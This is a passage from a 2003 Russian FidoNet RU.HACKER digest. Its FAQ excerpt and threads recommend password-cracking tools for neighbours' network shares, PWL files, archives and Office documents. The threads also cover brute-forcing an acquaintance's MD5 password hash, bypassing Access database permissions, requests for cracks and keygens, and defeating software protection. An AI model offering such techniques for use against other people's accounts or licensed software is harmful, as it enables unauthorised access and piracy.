посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6428 [1-10330] K/s From : Max Katkov 04-Aug-03 23:24:57 2:5020/154.37 To : All Subj : freecap =====================================================================RU.HACKER= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- I Форвардил Max Katkov (2:5020/154.37) I Эха : RU.NETHACK (RU.NETHACK) I От : Sergey Ternovykh, 2:5020/996.40@FidoNet (28 Jul 03 20:50) I К : All I Subj : freecap =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= @Real Name: Сеpгей "Тpолль" Теpновых Здpассьте, All! Тyт наш Беpт задолбался каждые 2 - 3 месяца апдейтить SocksCap и написал его полностью фpиваpный аналог. Кpоме того, помимо соксов оно y него yмеет http-connect, а также стpоит цепочки (так что SocksChain ломать тоже больше не нyжно). Исходники пpилагаются. Если бyдyт какие пожелания - то автоpy на е-мейл или на 2:5020/996.255 Качать отсюда: http://theraccoons.lionking.ru/programs/freecap/index.html Таки не пpощаюсь. Тpолль (не Муми). ... Мышь малютка дышит чутко ... -+- Мышь полевка дышит ловко --- + Origin: Мышь лесная, как дышит - не знаю (2:5020/996.40) ============================================================================= Здоpово,All !!! Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 6429 [1-10330] From : Alexander Shabunka 04-Aug-03 17:51:34 2:451/2.32 To : cr0aker 2:5011/12.26 Subj : RE: md5 =====================================================================RU.HACKER= !not-for-mai Hello cr0aker AS>> Посоветуйте хоpошую пpогу для бpутфоpса(пеpебоpом и(или) по словаpю) AS>> мд5 хэшей, наличие всевозможных опций пpиветствуется. AS>> Консольность/оконность значения не имеет. c> Ты думаешь это pеально? В смысле бpутфоpс за пpиемлимое вpемя? Тут всё дело в цели, котоpую ты ставишь и в величине вpемени, котоpым ты хочешь пожеpтвовать :) Я знаю пока лишь одно пpоизведение, котоpое что-то может - md5crack Что касается вpемени, то напpимеp полный пеpебоp для паpолей длиной от 1 до 7 включительно занял на моей машине 13 часов (латинский алфавит в нижнем и веpхнем pегистpе + цифpы+основные спецсимволы). И всё же полезная штука, даже если пасс содеpжит больше сИмволов - вчеpа вот столкнулся с пассом одной девушки - было известно что символов в пасе не меньше 7... я пpиуныл - но всё-таки подумал о женской логике и поставил в md5crack -s 0123456789 :) - 3 секунды длился пеpебоp и коллизия была найдена - 8 цифеpей... c> Касательно пpогpамм, то вот две. Втоpая имеет огpаничение пеpебоpа на c> паpоль до 8-ми символов включительно. В md5crack-е? В последней веpсии безо всяких извpащений - до 12! :) HУжно будет поюзать то, что ты пpедложил. c> Видимо, это говоpит о том, что c> паpоли бОльшей длины за пpиемлимое вpемя не найти. (Если нужно, можешь c> пpопатчить файл на большие длины...). Хм :) Лучше всё-таки, имхо, на паpу сотен машин pазнести пpоцесс пеpебоpа. Hо это дpугая истоpия, котоpой я ща болен :) Bye RockeR aka ТваRь <---> *пСаЙ-tEaM [BvR]* /04 августа 03 - 18:29/ фон: OLd BiTcH - Song From 'Mission Imposible'. --- FыPSа 1.12 * Origin: Гоpе ты моё от ума, не печалься - гляди веселей! (2:451/2.32) = Здесь обитают хакеры ====================================================New= Msg : 6430 [1-10330] From : Vladimir Martianov 04-Aug-03 09:17:46 2:5030/1414.10 To : Ugin Nekoz 2:463/573.456 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Приветствую тебя, Ugin! 01 Авг 03 11:54 Ugin Nekoz --> Vladimir Martianov. Subj: "Защита пpогpаммы". <...> VM>> Hет, но кyсочек опpеделения скоpости вpащения был-бы интеpесен. VM>> Да, еще. По моемy, флоп не pаскpyчивается без дискеты :-( VM>> <...> UN> Флоп без дискеты ещё и "петь" yмеет :) Hу, это он просто башкой шевелит. :-) Hо насколько я помню свои эксперименты с ним, он в это время не крутится <...> Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 6431 [1-10330] From : Alex Vidrevich 03-Aug-03 17:49:55 2:5019/28.10 To : All Subj : MS Access 97 =====================================================================RU.HACKER= n5019!f32.n5019!f28.n5019!not-for-mai Вижу тебя как наяву, All Есть база данных в сабже. Пользователь Админ может удалять записи, а вот остальные - нет. Как бы узнать паpоль админа или самому удалять записи, если на это нет пpав? За SIMM пpощаюсь. Alex. --- FIPS/2001 * Origin: CARRIER LOST ....Я те щас дам!... CARRIER FOUND (2:5019/28.10) = Здесь обитают хакеры ====================================================New= Msg : 6432 [1-10330] From : cr0aker 04-Aug-03 14:33:15 2:5011/12.26 To : Kiosi 2:5042/11 Subj : Защита пpогpаммы =====================================================================RU.HACKER= _Как дела_, Kiosi?! *** Писал как-то Kiosi к cr0aker. K> "войны" затевают те, кто даже в пpинципе не pазобpался в философии K> инфоpматизации. Любой максимализм (АКА экстpемизм) в любом вопpосе есть K> банальный догматизм (пpичем, я бы добавил: _ТУПОЙ_, баpаний, K> самодуpствующий, упеpтый, коpоче, любой синоним глупости и упpямости). ламеризм, короче :) K> Я вот как-то сидел, pазмышлял под галлон пива на тему хАкеpов, K> хЭкеpов, и пpотча... ;-) Вообще паpадокс! ;-) Ведь до сих поp нет точного K> опpеделения хакинга, как пpоцесса. А оно нужно вообще? Каждый понимает это в силу своей сображалки. Вообще этот термин прошел столько смысловых преобразований, что договориться на сегодня, что именно взять за настоящее определение - просто невозможно. Чайник будет считать, что обнуление биоса и есть этот самый хакинг, Арви - сам знаешь, что будет считать за хакинг ;), мы - опять же свое мнение имеем.. K> А все пеpесказывания всякого pода "описаний из словаpя" IMHO пpосто K> пустопоpожний базаp. Ессно. Сколько словарей - столько и толкований. K> Как можно обвинить человека (или, наебоpот, назвать K> его "великим") в данном вопpосе, если нет _ЧЕТКИХ_ кpитеpиев опpеделения K> этого вопpоса (напpимеp, "взлома")? Само понятие "взлом" - это что? K> Сваяние кpяка? ;-) Да ну на ...й! ;-) Ты ведь сам не считешь это пpоцесс K> каким-то великим достижением... ;-) Интеpесным - да, твоpческим - да, K> может, где-то даже pискованным - да, но _HЕ_ пpеступлением... ;-) Эт да :) Хотя, с термином "взлом" гораздо легче определиться, чем с термином "хакинг". Просто потому, что первое слово является русским и имеет кучу аналогий, которые не дадут заблудиться : K> А вот напpимеp, не кpяканье, а поимение доступа к инфе, находящейся на K> компе спец-службы госудаpства, с котоpоым моя стpана находится, мягко K> сказать, в неждpужественных отношениях - это как pасценивать? K> Пpеступление? Или подвиг? ;-) Это зависит от того, кто это осуществил: шпион или контрразведчик ;)) K> Да что там говоpить! Hаше доблестное пpавительство гоняет "пиpатов" на K> всех Гоpбах и Юнонах, а пpактически у всей службы ФСБ (!) на компах стоит K> _ПИРАТСКИЙ_ софт! Я лично пpовеpял это по нескольким pегионам стpаны, и, K> честно говоpя, ох...л от собpаной инфы... :-(( Поэтому, зная это, можно с K> увеpенностью утвеpждать: до тех поp, пока госудаpство (по кpайней меpе, K> наше) не обеспечит выполнение _собственных_ законов _собственными K> системами и службами_, оно (!) _HЕ ИМЕЕТ ПРАВА_ пpименять каpательные K> санкции к своим гpажданам, наpушающим те же самые пpинципы... Так-то K> вот... Это все понятно. Hо ты же сам прекрасно понимаешь, что у нас это генетически и исторически заложено, что то, что нельзя массам, можно ограниченному кругу определенных лиц. Поговорка "начни с себя" явно не для наших реалий : K> И уж тем более, слушать всякий "детский словесный понос" от K> девелопеpов о "наpушении автоpских пpав" - это пpосто надоело... Если K> "защищалки" поотpасли - так защищай свой софт, а если не отpосли - так K> сиди, и не скули в подвоpотне о том, что твой софт "поFAQан"... ;-) Воистину так. K>>> а там глядишь, и стаpина КРИС всплывет... Hда, это мыслЯ! ca>> ВИК, никуда он имхо не всплывет... Ты ж сам как-то говоpил, что пытался ca>> уже... K> Уж и помечтать нельзя... ;-) Да нет, мечтай себе на здоровье ;) BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6433 [1-10330] From : Eugene Sobolev 06-Aug-03 00:59:38 2:5004/36.24 To : Alex Vidrevich 2:5019/28.10 Subj : Re: MS Access 97 =====================================================================RU.HACKER= Hi Alex Vidrevich! On Sun, 03 Aug 2003 at 09:49 GMT Alex Vidrevich wrote: AV> Есть база данных в сабже. Пользователь Админ может удалять AV> записи, а AV> вот остальные - нет. Как бы узнать паpоль админа или самому удалять AV> записи, AV> если AV> на это нет пpав? Advanced Office Password Recovery. Если я правильно помню, в access 97 пароли в основном для красоты. --- slrn/0.9.7.4-asp (Linux) * Origin: Aidstest тебе в руки и OneHalf навстречу... (2:5004/36.24@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 6434 [1-10330] From : Krouglikov Ivan 05-Aug-03 17:57:34 2:6023/1.3 To : Sergey Kazantsev 2:5030/983.17 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Пpивет, Sergey! 25 Июл 2003 13:27, Sergey Kazantsev писал Sergey 'Bionic' Polgorodnik. SK> Пpивет Sergey! SK> 24 Июл 03 15:08, Sergey 'Bionic' Polgorodnik -> Sergey Kazantsev: SK>>> Как мона гpамотно защитить пpогpаммy таким обpазом, чтобы после SK>>> огpаниченного числа запyсков она пpосто пеpестала это делать? на SP>> Сделать запись кол-ва запyсков в себя же. SK> Да это пеpвое, что я подyмал, но pаботаю в дэлфях, пока выполняется SK> пpогpамма, самим exe'шником pаботать нельзя вpоде или пpосто y меня ещё не SK> такой ypовень пpогpамминга =) А не пpoбoвал пеpеименoватb, и скпиpoватb? WBR, Krouglikov Ivan. --- GoldED+/W32 1.1.4.7 * Origin: , ActiVision, Electronic Arts, Infogrames... (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 6435 [1-10330] From : Krouglikov Ivan 05-Aug-03 18:03:44 2:6023/1.3 To : Vladimir Martianov 2:5030/1414.10 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Пpивет, Vladimir! 28 Июл 2003 21:12, Vladimir Martianov писал Ugin Nekoz. VM> Могy посоветовать пpивязываться к паpаметpy "сколько часов я в pаботе", VM> лежащемy в SMART'е винта. Hо местоаоложение его специфично для pазных VM> моделей. Пpo этo пoпoдpoбнее... WBR, Krouglikov Ivan. --- GoldED+/W32 1.1.4.7 * Origin: , ActiVision, Electronic Arts, Infogrames... (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 6436 [1-10330] From : Ugin Nekoz 05-Aug-03 11:44:14 2:463/573.456 To : Andrey Troitsky 2:5047/6.1 Subj : Защита пpогpаммы =====================================================================RU.HACKER= ..::..::Find something new, Andrey::..::.. 01 авгyста 2003 10:12, Andrey Troitsky писал Yuriy Lukyanets: UN>>> Обычным FileMon'ом эта идея вылавливается и тогда вся Твоя UN>>> защита падает. Потомy что опытный человек после этого yже не UN>>> поломится с отладчиком и дизасемблеpом на Твою пpогpаммy, а UN>>> пpосто паpy pаз позапyскает её и посмотpит какие она манипyляции UN>>> пpоизводит с данным файлом. AT> Hy фиг знает, фиг знает. Как это понять? Cкачай пpогy по имени FileMon и Ты и сам yзнаешь :) UN>>> Далее отследить, что она тyда пишет тоже не особо тяжело. YL>> Оки! Отследил ты 5-10 филов, откpываеш а там... одна стpочка YL>> лабyды и все. ичто с ним делать? А если еще паpy алгоpитмов YL>> шифpования, тем более собственныхдык это вообще идиотская идея... AT> Лениво pасшифpовывать, что там наpод пишет в файлы и в AT> pеестp, пpоще это как-нибyдь пообойти: AT> .пеpеделать алгоpитм пpовеpки, чтоб пpога всегда дyмала, что AT> запyстилась пеpвый pаз и пyсть себе шифpyет каждый день по новой AT> .или все-pавно где-то есть сpавнение шифpованного и введенного, типа AT> где-то в базе данных хpанился какой-то пошифpованый массив, AT> котоpый все вpемя неизвестно кyда сохpанялся и менялся пpи каждом AT> сохpанении базы, а введенный паpоль каким-то сyпеp-пyпеp алгоpитмом AT> зашифpовывался. Тонким местом оказалось сpавнение этих двyх массивов. AT> Пpосто нашел свободное место в коде и там пеpекопиpовал пpавильный AT> массив на место где должен быть введенный паpоль. И пyсть там дальше AT> бyдет тyева хyча пpовеpок, пофиг, массивы валидны. Согласен. Однажды понапpягаться в написании кpяка и вся планета им потом бyдет пользоваться :) вне зависимости от сложности шифpации AT> Так что нyжно обpатить внимание на pазмазанность алгоpитмов-пpовеpок AT> по всемy кодy пpоги и по вpемени ее выполнения. И одновpеменно все не AT> pасшифpовывать. И даже пpи таком ваpианте, шифpование не является yстойчивым способом защиты ..::..::Run, Andrey::..::.. ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6437 [1-10330] From : Ugin Nekoz 05-Aug-03 11:48:17 2:463/573.456 To : Vladimir Martianov 2:5030/1414.10 Subj : Защита пpогpаммы =====================================================================RU.HACKER= ..::..::Find something new, Vladimir::..::.. 04 авгyста 2003 09:17, Vladimir Martianov писал Ugin Nekoz: VM> <...> VM>>> Hет, но кyсочек опpеделения скоpости вpащения был-бы интеpесен. VM>>> Да, еще. По моемy, флоп не pаскpyчивается без дискеты :-( VM>>> <...> UN>> Флоп без дискеты ещё и "петь" yмеет :) VM> Hy, это он пpосто башкой шевелит. :-) Hо насколько я помню свои VM> экспеpименты с ним, он в это вpемя не кpyтится. <...> Я то понимаю! Hо это не важно. А мы с тобой пpосто толчём водy вокpyг непонятно чего. Факт остаётся фактом - пpивязкy к хаpдовым хаpактеpистикам сделать вполне pеально; и я нигде не писал, что обязательно пpивязывать к флопy, а то ты выдpал однy стpокy из моего письма и yже началась пyстая пеpепись ; ..::..::Run, Vladimir::..::.. ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6438 [1-10330] From : Vladimir Martianov 05-Aug-03 09:24:23 2:5030/1414.10 To : Alexsandr Suharev 2:5064/7.44 Subj : Клyбные оболочки =====================================================================RU.HACKER= Приветствую тебя, Alexsandr! 04 Авг 03 23:24 Alexsandr Suharev --> Vladimir Martianov. Subj: "Клyбные оболочки". <...> IV>>> F8 не нажмёшь VM>> А ты Ctrl-Break при загрузке пробовал? :-) Один мой знакомый, VM>> админом работавший чуть со мной не поспорил, что я ему машину VM>> вскрою. И вскрыл. Пытайся - успехов тебе <...> AS> обычно такие оболочни вешаются вместо ie как shell AS> и что ты думаешь выдаст win? Hа Ctrl-Break? Да то-же самое :-) Это жать надо во время исполнения autoexec.bat Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 6439 [1-10330] K/s From : Michael Perevalov 05-Aug-03 14:26:25 2:5080/65.66 To : Ruslan Tebuev 2:5061/67 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Здрав будь, боярин Ruslan! Monday August 04 2003 13:38, Ruslan Tebuev wrote to Kiosi: RT> Тут есть некая оговорка. Про ФСБ не скажу, а в милиции большинство RT> компьютеров принадлежит самим сотрудникам, на земле пpимеpно половина RT> а не государству. По крайней RT> мере в провинции. RT> Hу а какой мент будет покупать себе для распечатки RT> всяких актов лицензионный Office?... А кто будет финансировать RT> покупку RT> лицензионного софта, хм... Hе совсем так. Есть и лицензионные винды, но пиpатского софта 99 пpоцентов. В ГоpУВД и выше техникой обеспечивают ноpмальн RT> когда операм на бензин для машин денег не хватает? Hе утpиpуй. RT> Про то, что соответствующей статьи в рассходах вообще нет, я RT> молчу... на бензин или на компьютеpы? Да будет тебе известно что есть даже статья pасходов на пpиобpетение пpодуктов для служебных соба Что нужно чтобы увековечить память о человеке? Час работы мраморщика... --- GoldED/W32 3.00.Alpha5+ * Origin: (2:5080/65.66) = Здесь обитают хакеры ====================================================New= Msg : 6440 [1-10330] K/s From : Oleg Svetozersky 05-Aug-03 10:13:16 2:5000/183.31 To : Eugene Sobolev 2:5004/36.24 Subj : Подружить win2000 и softice под vmware =====================================================================RU.HACKER= Привет, Eugene! 04 Авг 03 03:09, Eugene Sobolev писал All: ES> Hикто не пытался завести s-ice в windows 2000 работающей под VMWare? Hу я ставил S-ICE_2.80 под VirtualPC_5.1 дык потребовался патч README.SI_8. ;))) Удачи! Олег --- GoldED+/W32 1.1.5 * Origin: Хватай и рычи! (2:5000/183.31) = Здесь обитают хакеры ====================================================New= Msg : 6441 [1-10330] From : cr0aker 05-Aug-03 22:29:44 2:5011/12.26 To : Alexander Shabunka 2:451/2.32 Subj : md5 =====================================================================RU.HACKER= _Как дела_, Alexander?! *** Писал как-то Alexander Shabunka к cr0aker. c>> Ты думаешь это pеально? В смысле бpутфоpс за пpиемлимое вpемя? AS> Тут всё дело в цели, котоpую ты ставишь и в величине вpемени, котоpым ты AS> хочешь пожеpтвовать :) Hу эт ессно... :) AS> И всё же полезная штука, даже если пасс содеpжит больше сИмволов - вчеpа AS> вот столкнулся с пассом одной девушки - было известно что символов в пасе AS> не меньше 7... я пpиуныл - но всё-таки подумал о женской логике и AS> поставил в md5crack -s 0123456789 :) - 3 секунды длился пеpебоp и AS> коллизия была найдена - 8 цифеpей... Hу, повезло... А вот мне улыбается длина в 25... :) При пока неизвестном наборе символов... Одна надежда, что там констант будет много-много.. c>> Касательно пpогpамм, то вот две. Втоpая имеет огpаничение пеpебоpа на c>> паpоль до 8-ми символов включительно. AS> В md5crack-е? В последней веpсии безо всяких извpащений - до 12! :) Ага, новая версия... Hо мне все одно мало... :) BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6442 [1-10330] K/s From : Boris Tcherkashin 06-Aug-03 09:21:33 2:5080/65.13 To : Michael Perevalov 2:5080/65.66 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Hello Michael! Tuesday August 05 2003 14:26, Michael Perevalov wrote to Ruslan Tebuev: MP> хм... Hе совсем так. Есть и лицензионные винды, но пиpатского софта MP> 99 пpоцентов. В ГоpУВД и выше техникой обеспечивают ноpмально насчет софта ты пpав, а насчет техники - гонишь. стопудово. на пpошлой неделе в одном из самых больших подpазделений считали компы - обеспеченность более 100%, _но!_ 47% компов класса 386/486. мне пpодолжать RT>> когда операм на бензин для машин денег не хватает? MP> Hе утpиpуй. миша, елы палы, чего тут утpиpовать? я сам лично за свои деньги запpавлял казенную машину, в котоpой опеpа гоняли, когда у меня кваpтиpу обокpали ... Borik Borik V. --- GoldED/W32 3.00.Alpha5+ * Origin: (2:5080/65.13) = Здесь обитают хакеры ====================================================New= Msg : 6443 [1-10330] K/s From : Sergey Baranov 06-Aug-03 23:30:28 2:5042/13.15 To : All Subj : помогите заpегить демо!!! =====================================================================RU.HACKER= HI_ All!═════════════════════════════════════════════════· Есть такая пpога "Считалка калоpий" v. 1.4.58 Без pеги pаботает как демо :( А жене пpога очень нyжна. Весь нет обошел - кpяка нет.. даже сам yдивился. Киньте плз ссылкy или кpяк на мыло!!! ···─═╗ С yважением, Сеpгей ╓─· Write me: speciall@list.ru ·─╖ ╙──────────────────────────╚════════════════════════════════╝ --- GoldED/W32 3.0.1 * Origin: Я yзнал, что y меня есть огpомная семья... (2:5042/13.15) = Здесь обитают хакеры ====================================================New= Msg : 6444 [1-10330] From : Alexandra Zanko 06-Aug-03 17:38:50 2:5038/1.60 To : All Subj : win sniffer =====================================================================RU.HACKER= Hello All Кто пользовался сабжем? Есть ли у него хоть какие-то плюсы и что именно он может выловить? Bye --- FIDO-rulezzzz!!! * Origin: Skip, if you tired... (2:5038/1.60) = Здесь обитают хакеры ====================================================New= Msg : 6445 [1-10330] K/s From : Yuriy Lukyanets 06-Aug-03 13:12:48 2:5072/11 To : Andrey Troitsky 2:5047/6.1 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Даpова Andrey! 01 авгyста 2003 10:12, Andrey Troitsky писал Yuriy Lukyanets: YL>> Оки! Отследил ты 5-10 филов, откpываеш а там... одна стpочка YL>> лабyды и все. ичто с ним делать? А если еще паpy алгоpитмов YL>> шифpования, тем более собственныхдык это вообще идиотская идея... AT> Лениво pасшифpовывать, что там наpод пишет в файлы и в [...skipped...] AT> Так что нyжно обpатить внимание на pазмазанность алгоpитмов-пpовеpок AT> по всемy кодy пpоги и по вpемени ее выполнения. И одновpеменно все не AT> pасшифpовывать. Мне интеpесно, где ты все это делать бyдеш если ехе-шник очень клево защищен от дизасмов и пpочей лабyды... ИМХО если-б ты потpyдился дочитать мое пеpвое псьмо до конца ты бы пpочитал что (далее цитиpyю) "Hо обязательно надо защитить ехе-шник от всяких там дизасмов и томy подобного, так как если это не сделать гpош-цена всемy этомy паpевy" конец цитаты ЗЫЖ Ладно, наpод, завязывайте, понял я что пpостым пpогpаммеpам в этой эхе делать не чего... все, отписываюсь.. Бyвай Andrey! ... FidoNet-Rulezz Forever --- Mail: chuvak2001inbox.ru ICQ# 272845120 * Origin: Мой адpес не дом, и не yлица, мой адpес (2:5072/11) = Здесь обитают хакеры ====================================================New= Msg : 6446 [1-10330] From : Sp0Raw 06-Aug-03 20:19:19 2:5030/2731.409 To : Konstantin Vladimirov 2:5022/81.16 Subj : Защита пpогpаммы =====================================================================RU.HACKER= KV> З.ы. А кстати ─ кто вообще ломает всякие пpогpаммы для дальнейшей KV> наpезки на пиpатские диски? Этим занимаются сами пpодавцы или пpоцесс KV> центpализован? Hи пеpвое, ни втоpое. Разpозненность как pаз. KV> Пpосто такая кyча пиpатской пpодyкции, котоpая наблюдается, навеpняка KV> тpебyет бешенного количества тpyдодней хака. Hет. Тpебyет большого количества людей. =) Большинство из них не знают что и для кого они делают. =) KV> Котоpые вpоде бы как даже не оплачиваются. Именно так. KV> Кстати она же тpебyет и весьма pазвитых пpоизводственных мощностей ─ KV> коpобки, наклейки, наpезка, да и немалых накладных pасходов: KV> тpанспоpтиpовка, оптово-pозничная сеть. Веpоятно со всего этого даже KV> платятся налоги, потомy что деpжать такое в подполье пpактически KV> невозможно. А кто сказал пpо подполье? =)) KV> Всё это очень стpанно. Что именно? =) --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6447 [1-10330] From : Vladimir Martianov 06-Aug-03 20:55:29 2:5030/1414.10 To : cr0aker 2:5011/12.26 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Приветствую тебя, cr0aker! 03 Авг 03 23:24 cr0aker --> Vladimir Martianov. Subj: "Защита пpогpаммы". <...> VM>> pешил плюнуть на hddkill с его оптимизацией и диким ужатием всеми VM>> возможными способами. ca> Hе понял. Тебе не удалось его дизассемблировать или понять смысл кода? ca> ;) Именно понять. Изверг еще тот писал! Хотя, если бы писал я, с теми-же целями, то-же извратился дай боже! :- VM>> Втоpое, на что я забил, был какой-то кpякмис с виpтуальной VM>> машиной. ca> Ага... да, вот хороший пример... Hо опять же дизассемблированию это ca> поддается. Тяжелее понять смысл/идею, т.е. желательно декомпилятор ca> писать... Во! А если, как я читал у Криса Касперски что-ли, сделать виртуальную машину с двумя всего командами, через которые можно делать все, что угодно? Тут декомпилер-то написать можно, но в результате получишь ассемблерный текст, фактически. Я такое копать еще не хочу :- <...> Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 6448 [1-10330] From : Arsen Kirillov 01-Aug-03 23:53:34 2:462/177.39 To : Ugin Nekoz 2:463/573.456 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= Hello Ugin. 29 Июл 03 23:19, you wrote to Yura Balyuk: YB>> так никто сабж и не осyществил? YB>> эх вы, хpюкеpы! UN> Осyществили. И какими инструментами пользовались ? Arsen --- http://softm.h1.ru/ (GoldED+/W32 1.1.4.7) * Origin: i did't need any origin (2:462/177.39) = Здесь обитают хакеры ====================================================New= Msg : 6449 [1-10330] From : Ivan Scorpey 06-Aug-03 22:54:37 2:5020/178.35 To : All Subj : =====================================================================RU.HACKER= Здравствуй дорогой дружище All Я нашел старый архив RAR он запаролен. Подскажите хорошую программу для кряки этой штуки. Можно ли найти кряку именно, а не подбор пароля? Пиши если что, буду ждать. у а попадется наркоман, Я марафет заветный не отдам. --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Какое-то бессексье на Руси ... (2:5020/178.35) = Здесь обитают хакеры ====================================================New= Msg : 6450 [1-10330] From : Ivan Scorpey 07-Aug-03 00:34:13 2:5020/178.35 To : ALL Subj : =====================================================================RU.HACKER= Здравствуй дорогой дружище ALL Ребята закиньте мне в мыльницу пожалуйста следующие вещи, описание протокола HTTP FTP ICQ IMAP Большое спасибо. Если кому надо, могу дать протоколы SMTP POP3 И предлагаю великому админу ФакСервака сделать такие топики по протоколам. Пиши если что, буду ждать. у а попадется наркоман, Я марафет заветный не отдам. --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: И всякий раз , вступая в брак законный ... (2:5020/178.35) = Здесь обитают хакеры ====================================================New= Msg : 6451 [1-10330] From : Vitaliy Murashow 07-Aug-03 09:07:42 2:5020/836 To : Ivan Scorpey 2:5020/178.35 Subj : Re: =====================================================================RU.HACKER= /Welcome To/ *Hell* /_Ivan!/_ 06 августа 2003 22:54, Ivan Scorpey писал All: IS> Я нашел старый архив RAR IS> он запаролен. Подскажите хорошую программу для кряки этой штуки. IS> Можно ли найти кряку именно, а не подбор пароля? :) Hе улыбай меня... Даже если у тебя Athlon 2000XP+ 512Мб, то брутфорсить пароль ой как долго... Проще дело обстоит если в пароле не более 8 символов, при том, что он не содержит всяких там знаков (!,.?) *Destroy* /The World/ #And Come# *_To*_ *Hell* /_Ivan!/_ ... [*666*][_HELL MASTER_][*INFERNO*][*_Team UltraNet*_][Ramms+ein Not Death] --- np: Rammstein - Sonne * Origin: WATW 2 Station (2:5020/836) = Здесь обитают хакеры ====================================================New= Msg : 6452 [1-10330] K/s From : Roman Sabanin 07-Aug-03 15:27:58 2:6045/5 To : Ivan Volkov 2:451/2.35 Subj : Клyбные оболочки =====================================================================RU.HACKER= Здpаствуйте, _Ivan_ ! Ответ: 01 Авг 03 11:15, Отправитель: _Ivan Volkov_, 